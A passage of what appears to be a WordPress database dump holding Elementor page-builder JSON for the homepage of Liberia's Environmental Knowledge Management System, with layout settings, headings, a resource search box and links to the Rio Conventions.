Agreements\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"49af793\",\"elType\":\"widget\",\"settings\":{\"items_list\":[{\"item_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_cbd-1.jpg\",\"id\":1854},\"item_title\":\"UNCBD\",\"item_text\":\"The United Nations Convention on Biological Diversity\",\"item_link\":\"https:\\/\\/ekmsliberia.info\\/mea-resource\\/united-nations-convention-on-biological-diversity\\/\",\"item_link_target\":\"\",\"_id\":\"7311fcf\",\"item_content_type\":\"default\",\"item_link_rel\":\"\",\"item_button_text\":\"\",\"template_id\":\"0\"},{\"item_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_fccc.jpg\",\"id\":1856},\"item_content_type\":\"default\",\"item_title\":\"UNFCCC\",\"item_text\":\"The United Nations Framework Convention on Climate Change\",\"item_link\":\"https:\\/\\/ekmsliberia.info\\/mea-resource\\/united-nations-framework-convention-on-climate-change\\/\",\"item_link_target\":\"\",\"item_link_rel\":\"\",\"item_button_text\":\"\",\"template_id\":\"0\",\"_id\":\"8abca95\"},{\"item_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_ccd.jpg\",\"id\":1855},\"item_content_type\":\"default\",\"item_title\":\"UNCCD\",\"item_text\":\"The United Nations Convention to Combat Desertification\",\"item_link\":\"https:\\/\\/ekmsliberia.info\\/mea-resource\\/united-nations-convention-to-combat-desertification\\/\",\"item_link_target\":\"\",\"item_link_rel\":\"\",\"item_button_text\":\"\",\"template_id\":\"0\",\"_id\":\"6b2d2f2\"}],\"item_layout\":\"banners\",\"animation_effect\":\"sarah\",\"img_size\":\"medium\",\"title_html_tag\":\"h6\",\"equal_height_cols\":\"true\",\"slides_to_scroll\":\"3\",\"pause_on_hover\":\"true\",\"autoplay_speed\":2500,\"centered\":\"true\",\"background_background\":\"classic\",\"normal_opacity\":0.40000000000000002220446049250313080847263336181640625,\"hover_opacity\":0.59999999999999997779553950749686919152736663818359375,\"items_title_color\":\"#ffffff\",\"items_title_typography_typography\":\"custom\",\"items_title_typography_font_size\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"items_title_typography_font_weight\":\"900\",\"items_title_typography_letter_spacing\":{\"unit\":\"px\",\"size\":2.5,\"sizes\":[]},\"items_text_color\":\"#009ee2\",\"items_text_typography_typography\":\"custom\",\"items_text_typography_font_size\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]},\"items_text_typography_font_weight\":\"700\",\"slides_to_show\":\"3\"},\"elements\":[],\"widgetType\":\"jet-carousel\"},{\"id\":\"c151e2c\",\"elType\":\"widget\",\"settings\":{\"text\":\"View All Agreements\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/multilateral-environmental-agreements\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d48ccf5\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"37e777c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"0881e40\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"290555e\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"533b1b7\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"a8f2e29\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_color\":\"#000000\",\"padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"30\",\"bottom\":\"30\",\"left\":\"30\",\"isLinked\":true}},\"elements\":[{\"id\":\"46a8277\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"8076ded\",\"elType\":\"widget\",\"settings\":{\"title\":\"Start Contributing to the EKMS\",\"description\":\"Does your organization or institution work to complement the growing agenda on the Rio Conventions within Liberia? Are you interested in contributing to the knowledge resource by submitting a blog, news, story, case study, report or a publication?\",\"btn_text\":\"Join the team\",\"btn_link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/contribute\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"icon\":\"fa fa-angle-double-right\",\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"title_color\":\"#006400\",\"description_color\":\"#ffffff\",\"button_background_color\":\"#006400\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"oew-call-to-action\"}],\"isInner\":false}],\"isInner\":false}]'),(12499,2043,'_elementor_version','2.7.5'),(12500,2043,'_elementor_template_type','wp-page'),(12501,2043,'_elementor_page_settings','a:1:{s:21:\"background_background\";s:7:\"classic\";}'),(12504,2044,'_wp_page_template','default'),(12505,2044,'_elementor_edit_mode','builder'),(12506,2044,'_elementor_data','[{\"id\":\"lnk9sxt\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":900},\"height\":\"min-height\",\"custom_height\":{\"unit\":\"px\",\"size\":600},\"background_background\":\"slideshow\",\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"background_overlay_background\":\"classic\",\"background_overlay_color\":\"rgba(17,59,102,0.7)\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.5500000000000000444089209850062616169452667236328125},\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"fabc2a1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"background_slideshow_gallery\":[{\"id\":2035,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_epa.jpg\"},{\"id\":2036,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_home1.jpg\"},{\"id\":2037,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_home2.jpg\"},{\"id\":2038,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_home3.jpg\"},{\"id\":2039,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_maps.jpg\"}],\"background_slideshow_ken_burns_zoom_direction\":\"out\"},\"elements\":[{\"id\":\"ghttmw8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3q0r5o4\",\"elType\":\"widget\",\"settings\":{\"title\":\"Welcome to the EKMS\",\"align\":\"center\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":55},\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"4\",\"left\":\"0\",\"isLinked\":false},\"_css_classes\":\"no-margin\",\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":25}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f0wlz1l\",\"elType\":\"widget\",\"settings\":{\"editor\":\"The Environmental Knowledge Management System provides free and open access to information from key government and other institutions relating to the implementation of Rio Conventions. Explore the Knowledge Resources by Related Themes, Institutions and Documents.\",\"align\":\"center\",\"text_color\":\"#ffffff\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_font_family\":\"Arial\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"f4a4a39\",\"elType\":\"widget\",\"settings\":{\"search_placeholder_text\":\"Search Knowledge Resources...\",\"show_search_category_list\":\"yes\",\"search_category_select_placeholder\":\"Entire Resource\",\"results_counter_text\":\"Results\",\"full_results_btn_text\":\"See all results\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c6a37ad\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c698fbe\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"negative_search\":\"Sorry, but nothing matched your search terms.\",\"server_error\":\"Sorry, but we cannot handle your search query now. Please, try again later!\",\"search_submit_bg_color\":\"rgba(0,100,0,0.86)\",\"search_category_color\":\"#000000\",\"search_taxonomy\":\"resource_category\"},\"elements\":[],\"widgetType\":\"jet-ajax-search\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3b467af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"4a9f59c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"fb58b71\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f8f4095\",\"elType\":\"widget\",\"settings\":{\"title\":\"Knowledge Resources\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#54595f\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"62059d5\",\"elType\":\"widget\",\"settings\":{\"style\":\"dotted\",\"width\":{\"unit\":\"%\",\"size\":10,\"sizes\":[]},\"align\":\"center\",\"text\":\"Divider\",\"color\":\"#54595f\",\"weight\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"cc6fadf\",\"elType\":\"widget\",\"settings\":{\"min_height\":{\"unit\":\"px\",\"size\":450,\"sizes\":[]},\"show_terms\":\"\",\"show_terms_num\":\"2\",\"excerpt_length\":\"\",\"excerpt_trimmed_ending\":\"...\",\"show_date\":\"\",\"post_type\":\"related_topic\",\"custom_query_by\":\"ids\",\"post_ids\":\"468,470,473,474,487\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"5b2266b\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"76431bc\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"boxes_gap\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"boxes_title_color\":\"#ffffff\",\"boxes_title_color_hover\":\"#006400\",\"boxes_title_typography_typography\":\"custom\",\"boxes_title_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"boxes_title_typography_font_weight\":\"900\",\"boxes_title_alignment\":\"left\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-tiles\"},{\"id\":\"724fd77\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore All Topics\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/related-topics\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"89e8d8c\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/home_4.jpg\",\"id\":258},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"0\",\"bottom\":\"100\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5c4a65b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b82855d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"9b26f8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"8d9d9b1\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Institution\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"7448ecc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Explore Government and Other Institutions that have direct linkages with environmental policies and development.\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"cdd4f69\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore By Insitution\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/institutions-resources\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a2777f6\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_land_climate.jpg\",\"id\":493},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"0\",\"bottom\":\"100\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"cc16d03\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b4fc23b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"f419151\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"99692db\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Documents\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f7b0473\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Explore the EKMS Document Database.\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"259a529\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore All Documents\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/documents-and-other-resources\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"876ae3f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"37e777c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"81fa289\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9f9c8b3\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8aa33ed\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"db429d4\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_color\":\"#002600\",\"shape_divider_bottom_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"shape_divider_bottom_height\":{\"unit\":\"px\",\"size\":82,\"sizes\":[]},\"shape_divider_bottom_flip\":\"yes\",\"padding\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5a37cd7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"df23907\",\"elType\":\"widget\",\"settings\":{\"title\":\"Multilateral Environmental Agreements\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"49af793\",\"elType\":\"widget\",\"settings\":{\"items_list\":[{\"item_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_cbd-1.jpg\",\"id\":1854},\"item_title\":\"UNCBD\",\"item_text\":\"The United Nations Convention on Biological Diversity\",\"item_link\":\"https:\\/\\/ekmsliberia.info\\/mea-resource\\/united-nations-convention-on-biological-diversity\\/\",\"item_link_target\":\"\",\"_id\":\"7311fcf\",\"item_content_type\":\"default\",\"item_link_rel\":\"\",\"item_button_text\":\"\",\"template_id\":\"0\"},{\"item_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_fccc.jpg\",\"id\":1856},\"item_content_type\":\"default\",\"item_title\":\"UNFCCC\",\"item_text\":\"The United Nations Framework Convention on Climate Change\",\"item_link\":\"https:\\/\\/ekmsliberia.info\\/mea-resource\\/united-nations-framework-convention-on-climate-change\\/\",\"item_link_target\":\"\",\"item_link_rel\":\"\",\"item_button_text\":\"\",\"template_id\":\"0\",\"_id\":\"8abca95\"},{\"item_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_ccd.jpg\",\"id\":1855},\"item_content_type\":\"default\",\"item_title\":\"UNCCD\",\"item_text\":\"The United Nations Convention to Combat Desertification\",\"item_link\":\"https:\\/\\/ekmsliberia.info\\/mea-resource\\/united-nations-convention-to-combat-desertification\\/\",\"item_link_target\":\"\",\"item_link_rel\":\"\",\"item_button_text\":\"\",\"template_id\":\"0\",\"_id\":\"6b2d2f2\"}],\"item_layout\":\"banners\",\"animation_effect\":\"sarah\",\"img_size\":\"medium\",\"title_html_tag\":\"h6\",\"equal_height_cols\":\"true\",\"slides_to_scroll\":\"3\",\"pause_on_hover\":\"true\",\"autoplay_speed\":2500,\"centered\":\"true\",\"background_background\":\"classic\",\"normal_opacity\":0.40000000000000002220446049250313080847263336181640625,\"hover_opacity\":0.59999999999999997779553950749686919152736663818359375,\"items_title_color\":\"#ffffff\",\"items_title_typography_typography\":\"custom\",\"items_title_typography_font_size\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"items_title_typography_font_weight\":\"900\",\"items_title_typography_letter_spacing\":{\"unit\":\"px\",\"size\":2.5,\"sizes\":[]},\"items_text_color\":\"#009ee2\",\"items_text_typography_typography\":\"custom\",\"items_text_typography_font_size\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]},\"items_text_typography_font_weight\":\"700\",\"slides_to_show\":\"3\"},\"elements\":[],\"widgetType\":\"jet-carousel\"},{\"id\":\"c151e2c\",\"elType\":\"widget\",\"settings\":{\"text\":\"View All Agreements\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/multilateral-environmental-agreements\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"selected_icon\":{\"value\":\"fas 